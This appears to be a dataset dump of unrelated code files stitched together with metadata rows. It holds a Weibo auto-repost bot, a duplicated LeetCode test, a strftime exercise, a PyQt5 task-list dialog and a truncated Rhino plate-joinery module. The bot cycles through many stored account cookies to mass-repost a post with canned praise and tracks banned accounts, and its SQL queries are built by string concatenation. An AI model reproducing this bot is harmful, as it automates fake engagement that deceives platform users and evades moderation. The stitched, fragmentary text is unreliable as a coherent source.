"id": repost_id,
"content": repost_content,
"mid": repost_id,
"st":login_data_json["st"]
}
res = session.post(repost_url, data=postdata, headers=headers)
if res.text != "File not found.\n":
print("".center(30, "*"))
printToGui(str("".center(30, "*")))
print("账号id " + str(account_index + 1))
printToGui("账号id " + str(account_index + 1))
res_json = json.loads(res.text)
if res_json["ok"] == 0:
print(res_json)
printToGui(str(res_json))
if res_json["errno"] == "20003" or res_json["errno"] == "20034":
c = conn.cursor()
update_cmd = "UPDATE WeiboCookies SET STATE=\'号已被封禁,需要手机验证解封\' WHERE \"COOKIES\" = " + "\"" + account_group[account_index] + "\""
c.execute(update_cmd)
conn.commit()
printToGui(res_json["msg"])
if account_index == len(account_group)-1:
print("第" + str(repost_count) + "轮结束")
printToGui("第" + str(repost_count) + "轮结束")
repost_count += 1
account_index = 0
time.sleep(20)
continue
if repost_count == each_repost_count+1:
end_time = time.time()
print("转发结束")
printToGui("转发全部结束")
print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
printToGui(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
spend_time = end_time - begin_time
print("共花费" + str(spend_time) + "秒")
printToGui("共花费" + str(spend_time) + "秒")
return 0
else:
account_index += 1
continue
else:
print("账号id "+str(account_index + 1)+" 此号未绑定")
printToGui("账号id "+str(account_index + 1)+"此号未绑定")
print("".center(30, "*"))
printToGui(str("".center(30, "*")))
if account_index == len(account_group):
print("第" + str(repost_count + 1) + "轮结束")
printToGui("第" + str(repost_count + 1) + "轮结束")
time.sleep(20)
repost_count += 1
account_index = 0
continue
if repost_count == each_repost_count+1:
end_time = time.time()
print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
printToGui(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
spend_time = end_time - begin_time
print("共花费" + str(spend_time) + "秒")
printToGui("共花费" + str(spend_time) + "秒")
return 0
else:
account_index += 1
continue
else:
continue
def auto_repost_test_func(weibolink, account_group, each_repost_count, printToGui , conn):
"""
自动转发系统
:param weibolink: 微博链接
:param account_group: 号组
:param each_comment_count: 单号转发次数
:param outputTextEdit: 输出系统
:return:
"""
printToGui("微博自动转发")
next_rannum = 20
repost_count = 0
take_count = 0
begin_time = time.time()
print(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))
printToGui(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))
account_index = 0
while(True):
session = requests.session()
headers = {
"Host": "m.weibo.cn",
"Referer": "https://m.weibo.cn/compose/repost",
"Cookie": account_group[account_index]
}
random_num = random.randint(0, len(rainbow_word_list) - 1)
if(random_num != next_rannum):
repost_count += 1
next_rannum = random_num
repost_content = rainbow_word_list[next_rannum]
repost_id = int(weibolink[-16:len(weibolink)])
repost_url = "https://m.weibo.cn/api/statuses/repost"
st_url = "https://m.weibo.cn/api/config"
login_data = session.get(st_url, headers=headers).text
login_data_json = json.loads(login_data)["data"]
postdata = {
"id": repost_id,
"content": repost_content,
"mid": repost_id,
"st":login_data_json["st"]
}
res = session.post(repost_url, data=postdata, headers=headers)
if res.text != "File not found.\n":
res_json = json.loads(res.text)
if res_json["ok"] == 0 or repost_count == each_repost_count:
print("".center(30, "*"))
printToGui(str("".center(30, "*")))
print("账号id " + str(account_index + 1))
printToGui("账号id " + str(account_index + 1))
if res_json["ok"] == 0:
print(res_json)
printToGui(str(res_json))
if res_json["errno"] == "20003" or res_json["errno"] == "20034":
c = conn.cursor()
delete_cmd = "DELETE FROM WeiboCookies WHERE \"COOKIES\" = " + "\"" + account_group[account_index] + "\""
c.execute(delete_cmd)
conn.commit()
printToGui(res_json["msg"])
comment_count = 0
account_index+=1
if account_index == len(account_group):
print("第" + str(take_count+1) + "轮结束")
printToGui("第" + str(take_count+1) + "轮结束")
end_time = time.time()
print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
printToGui(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
spend_time = end_time - begin_time
print("共花费"+ str(spend_time) +"秒")
printToGui("共花费"+ str(spend_time) +"秒")
take_count += 1
return 0
else:
continue
else:
continue
else:
print("账号id "+str(account_index + 1)+" 此号未绑定")
printToGui("账号id "+str(account_index + 1)+"此号未绑定")
print("".center(30, "*"))
printToGui(str("".center(30, "*")))
account_index += 1
if account_index == len(account_group):
print("第" + str(take_count + 1) + "轮结束")
printToGui("第" + str(take_count + 1) + "轮结束")
end_time = time.time()
print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
printToGui(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
spend_time = end_time - begin_time
print("共花费" + str(spend_time) + "秒")
printToGui("共花费" + str(spend_time) + "秒")
take_count += 1
return 0
else:
continue
| 43.312796 | 153 | 0.47817 | 974 | 9,139 | 4.322382 | 0.148871 | 0.045606 | 0.037055 | 0.039905 | 0.910451 | 0.898812 | 0.862945 | 0.847268 | 0.826366 | 0.81734 | 0 | 0.01781 | 0.379473 | 9,139 | 210 | 154 | 43.519048 | 0.722095 | 0.034358 | 0 | 0.839779 | 0 | 0 | 0.10495 | 0.009146 | 0.01105 | 0 | 0 | 0 | 0 | 1 | 0.01105 | false | 0 | 0.022099 | 0 | 0.055249 | 0.309392 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3c4b2bd46f9b1e1bbf350e29a9139b2c73a0a96a | 1,452 | py | Python | tests/test_927.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | tests/test_927.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | tests/test_927.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import pytest
"""
Test 927. Three Equal Parts
"""
@pytest.fixture(scope="session")
def init_variables_927():
from src.leetcode_927_three_equal_parts import Solution
solution = Solution()
def _init_variables_927():
return solution
yield _init_variables_927
class TestClass927:
def test_solution_0(self, init_variables_927):
assert init_variables_927().threeEqualParts([1, 0, 1, 0, 1]) == [0, 3]
def test_solution_1(self, init_variables_927):
assert init_variables_927().threeEqualParts([1, 1, 0, 1, 1]) == [-1, -1]
def test_solution_2(self, init_variables_927):
assert init_variables_927().threeEqualParts([1, 1, 0, 0, 1]) == [0, 2]
#!/usr/bin/env python
import pytest
"""
Test 927. Three Equal Parts
"""
@pytest.fixture(scope="session")
def init_variables_927():
from src.leetcode_927_three_equal_parts import Solution
solution = Solution()
def _init_variables_927():
return solution
yield _init_variables_927
class TestClass927:
def test_solution_0(self, init_variables_927):
assert init_variables_927().threeEqualParts([1, 0, 1, 0, 1]) == [0, 3]
def test_solution_1(self, init_variables_927):
assert init_variables_927().threeEqualParts([1, 1, 0, 1, 1]) == [-1, -1]
def test_solution_2(self, init_variables_927):
assert init_variables_927().threeEqualParts([1, 1, 0, 0, 1]) == [0, 2]
| 23.047619 | 80 | 0.684573 | 204 | 1,452 | 4.578431 | 0.156863 | 0.250535 | 0.308351 | 0.12848 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0.101868 | 0.188705 | 1,452 | 62 | 81 | 23.419355 | 0.691002 | 0.027548 | 0 | 1 | 0 | 0 | 0.010448 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.333333 | false | 0 | 0.133333 | 0.066667 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 11 |
b1f52f459ac8752edaaa39221808b66fe8fb2c13 | 722 | py | Python | PythonHomework/P151T5.6.py | qw98qw98/colleageTime | 4166d19eb1fbbbe63d20301d4b93013b3a0a0d5d | [
"MIT"
] | 2 | 2019-04-24T09:17:26.000Z | 2019-04-25T02:32:26.000Z | PythonHomework/P151T5.6.py | qw98qw98/colleageTime | 4166d19eb1fbbbe63d20301d4b93013b3a0a0d5d | [
"MIT"
] | null | null | null | PythonHomework/P151T5.6.py | qw98qw98/colleageTime | 4166d19eb1fbbbe63d20301d4b93013b3a0a0d5d | [
"MIT"
] | null | null | null | from datetime import *
print(datetime(1999,9,17).date())
print(datetime(1999,9,17).strftime("Mybitthday is|%Y-%m-%d|"))
print(datetime(1999,9,17).strftime("Mybitthday is|%Y-%m-%d|,the %j in a year"))
print(datetime(1999,9,17).strftime("in %A |%Y-%m-%d| I was born."))
print(datetime(1999,9,17).strftime("in %a |%Y-%m-%d| I was born."))
print(datetime(1999,9,17).strftime("in %b %a |%Y-%m-%d| I was born."))
print(datetime(1999,9,17).strftime(" |%Y-%m-%d| I was born, in week %w,the %Wth Week in a year."))
print(datetime(1999,9,17).strftime(" __%Y**%m**%d__ I was born, in week %w,the %Wth Week in a year."))
print(datetime(1999,9,17).strftime(" __%Y**%m**%d__%Y.%m.%d."))
print(datetime(1999,9,17).strftime("%Y:%m:%d."))
| 60.166667 | 102 | 0.644044 | 142 | 722 | 3.21831 | 0.183099 | 0.284464 | 0.371991 | 0.393873 | 0.940919 | 0.897155 | 0.897155 | 0.897155 | 0.897155 | 0.80744 | 0 | 0.1059 | 0.084488 | 722 | 11 | 103 | 65.636364 | 0.585477 | 0 | 0 | 0 | 0 | 0.181818 | 0.422438 | 0.031856 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.090909 | 0 | 0.090909 | 0.909091 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 11 |
b1fe165e03aab89ea6cccd56998cefffc293644a | 12,834 | py | Python | tasks_completed.py | DivyamKakkar24/Farm-Widgets | a731e67732d421f230dc3ebd11c217033ee4fc52 | [
"MIT"
] | 2 | 2020-07-03T08:42:38.000Z | 2020-11-20T07:58:55.000Z | tasks_completed.py | divyamkakkar24/Farm-Widgets | a731e67732d421f230dc3ebd11c217033ee4fc52 | [
"MIT"
] | null | null | null | tasks_completed.py | divyamkakkar24/Farm-Widgets | a731e67732d421f230dc3ebd11c217033ee4fc52 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'tasks_completed.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
import sqlite3
class Ui_completed(object):
def setupUi(self, completed):
completed.setObjectName("completed")
completed.resize(441, 282)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(254, 246, 231))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(126, 118, 104))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(169, 158, 139))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(254, 246, 231))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(254, 246, 231))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(126, 118, 104))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(169, 158, 139))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(254, 246, 231))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(126, 118, 104))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(254, 246, 231))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(126, 118, 104))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(169, 158, 139))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(126, 118, 104))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(126, 118, 104))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
completed.setPalette(palette)
self.gridLayout = QtWidgets.QGridLayout(completed)
self.gridLayout.setObjectName("gridLayout")
self.list1 = QtWidgets.QListWidget(completed)
#
font = QtGui.QFont()
font.setPointSize(13)
self.list1.setFont(font)
#
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(36, 34, 41))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(72, 68, 82))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
self.list1.setPalette(palette)
self.list1.setObjectName("list1")
self.gridLayout.addWidget(self.list1, 0, 0, 1, 1)
self.buttonBox = QtWidgets.QDialogButtonBox(completed)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(36, 34, 41))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.buttonBox.setPalette(palette)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setCenterButtons(True)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
self.display()
self.retranslateUi(completed)
self.buttonBox.accepted.connect(completed.accept)
self.buttonBox.rejected.connect(completed.reject)
QtCore.QMetaObject.connectSlotsByName(completed)
def display(self):
MyDisplay = sqlite3.connect('tasks.db')
cusd = MyDisplay.cursor()
cusd.execute("SELECT * from tasksdone")
record = cusd.fetchall()
record.reverse()
#print(record)
for rec in record:
self.list1.addItem(rec[0])
def retranslateUi(self, completed):
_translate = QtCore.QCoreApplication.translate
completed.setWindowTitle(_translate("completed", "Completed Tasks"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
completed = QtWidgets.QDialog()
ui = Ui_completed()
ui.setupUi(completed)
completed.show()
sys.exit(app.exec_())
| 53.033058 | 106 | 0.691055 | 1,498 | 12,834 | 5.911215 | 0.100134 | 0.171767 | 0.102993 | 0.135178 | 0.829249 | 0.829249 | 0.829249 | 0.829249 | 0.829249 | 0.823715 | 0 | 0.041403 | 0.187003 | 12,834 | 241 | 107 | 53.253112 | 0.807265 | 0.015739 | 0 | 0.59276 | 1 | 0 | 0.007606 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013575 | false | 0 | 0.013575 | 0 | 0.031674 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
590689adc0981701acb939d484ca294e6172f5b7 | 520,254 | py | Python | platesjoinery.py | ibois-epfl/Manis-timber-plate-joinery-solver | fecdb1dfe23348de261f034f85baf24ac396e8cc | [
"MIT"
] | 3 | 2021-10-19T11:55:59.000Z | 2022-02-04T15:29:04.000Z | platesjoinery.py | ibois-epfl/Manis-timber-plate-joinery-solver | fecdb1dfe23348de261f034f85baf24ac396e8cc | [
"MIT"
] | null | null | null | platesjoinery.py | ibois-epfl/Manis-timber-plate-joinery-solver | fecdb1dfe23348de261f034f85baf24ac396e8cc | [
"MIT"
] | null | null | null | """
Module for Timber Plate Joinery from Digital Fabrication to Robotic Assembly
Classes:
- PlateModel : adjacency, topology, insertion vectors, assembly sequence...
- Module : inherits from model, sub-sequence, insertion vectors...
- Plate : thickness, contour, plane, normal...
- ToolBox : geometry function for rhino objects
"""
__author__ = "Nicolas Rogeau"
__laboratory__ = "IBOIS, Laboratory for Timber Construction"
__university__ = "EPFL, Ecole Polytechnique Federale de Lausanne"
__funding__ = "NCCR Digital Fabrication, ETH Zurich"
__version__ = "2021.10.18"
import rhinoscriptsyntax as rs
import Rhino.Geometry as rg
from ghpythonlib import components as gh
from Grasshopper import DataTree
from Grasshopper.Kernel.Data import GH_Path
import scriptcontext
import math
import copy
import ast
#Model -----------------------------------------------------------------------
class PlateModel:
def __init__(self, breps, sequence=0, constraints=[None,None,None,None,None], discard=[]):
# INITIALIZATION -------------------------------------
self.temp = []
self.log = []
self.count = len(breps)
self.sequence = self.__set_sequence(sequence)
self.breps = self.__reorder_breps(breps)
self.sequence = self.__reorder_sequence(self.sequence)
self.plates = self.__get_plates_from_breps()
# TOPOLOGY -------------------------------------------
self.discard = discard
self.contact_ids = self.__get_contact_ids()
self.contact_pairs = self.__get_contact_pairs()
self.contact_breps = self.__get_contact_breps()
self.contact_zones= self.__get_contact_zones()
self.contact_types = self.__get_contact_types()
self.contact_strings = self.__get_contact_strings()
self.contact_centers= self.__get_contact_centers()
self.contact_normals = self.__get_contact_normals()
self.contact_planes= self.__get_contact_planes()
self.contact_spheres = self.__get_contact_spheres(constraints)
# ASSEMBLY -------------------------------------------
self.contact_vectors = []
self.modules = self.__get_modules_from_sequence()
self.assembly_vectors = []
self.assembly_spaces = []
self.assembly_relatives = []
self.__get_assembly_vectors()
# STRUCTURAL ANALYSIS --------------------------------
self.FEM_joints = []
self.FEM_plates = [plate.mid_contour for plate in self.plates]
# MODEL INITIALIZATION ---------------------------------------
def __set_sequence(self, sequence):
"""return the default sequence if incorrect input is provided"""
if sequence == 0 or sequence == [] or sequence == None:
self.log.append('Sequence set to default : '+ str(range(self.count)))
return str(range(self.count))
else:
if type(sequence) is str:
Toolbox.Data.test_seq(sequence)
try: test = ast.literal_eval(sequence)
except: raise Exception(' An error occured when trying to convert sequence text to list of lists.')
self.log.append('Sequence set to custom : '+ str(sequence))
return sequence
else: raise Exception(' Sequence input should be expressed as a string.')
def __reorder_breps(self, breps):
seq = ast.literal_eval(self.sequence)
return Toolbox.Data.sort_list_sync(breps, Toolbox.Data.flatten_integer_list(seq))
def __reorder_sequence(self, sequence):
new_sequence = Toolbox.Data.reorder_sequence(sequence)
if new_sequence != sequence:
self.log.append('Breps and sequence have been reordered: '+ str(new_sequence))
return new_sequence
def __get_plates_from_breps(self):
plates=[]
for i in range(len(self.breps)):
# plate object creation
plates.append(Plate(self.breps[i], i))
return plates
def __get_modules_from_sequence(self):
# create sub_sequence list
seq = ast.literal_eval(self.sequence)
steps = Toolbox.Data.seq_to_steps(seq)
steps = Toolbox.Data.order_sequence(steps)
sub_seq = []
sub_steps = []
for i in range(len(steps)):
if steps[i] in Toolbox.Data.deepest_steps(seq): pass
else:
sub_steps.append(steps[i])
sub_seq.append(Toolbox.Data.get_item_from_path(seq, steps[i]))
sub_seq.append(seq)
sub_steps.append(['Model'])
# fill parent list
parents = []
for sub_step in sub_steps:
if sub_step == ['Model']: parents.append([])
elif len(sub_step) == 1 : parents.append(['Model'])
else: parents.append(sub_step[0:len(sub_step)-1])
# fill children list
children = Toolbox.Data.list_of_empty_lists(len(parents))
for i in range(len(parents)):
for j in range(len(sub_steps)):
if parents[i] == sub_steps[j]:
children[j].append(sub_steps[i])
# module creation
modules = []
for i in range(len(sub_seq)):
modules.append(PlateModule(self, i, sub_steps[i], str(sub_seq[i]), parents[i], children[i]))
return modules
# MODEL TOPOLOGY ---------------------------------------------
def __get_contact_ids(self):
mylist = []
for i in range(self.count):
sub = []
for j in range(self.count):
if i != j:
#discard
if ('('+str(i)+','+str(j)+')' == self.discard) or ('('+str(i)+','+str(j)+')' in self.discard) or ('('+str(j)+','+str(i)+')' == self.discard) or ('('+str(j)+','+str(i)+')' in self.discard):
self.log.append("pair "+str(i)+","+str(j)+" skipped")
else:
intersect = rs.IntersectBreps(self.breps[i],self.breps[j])
if intersect != None:
if len(intersect) == 1:
if rs.IsCurveClosed(intersect) is True:
if rs.IsCurvePlanar(intersect) is True:
sub.append(j)
else:
# if plate contours are intersecting the surfaces of the other plate
if rs.CurveBrepIntersect(self.plates[i].top_contour,self.plates[j].top_face) != None:
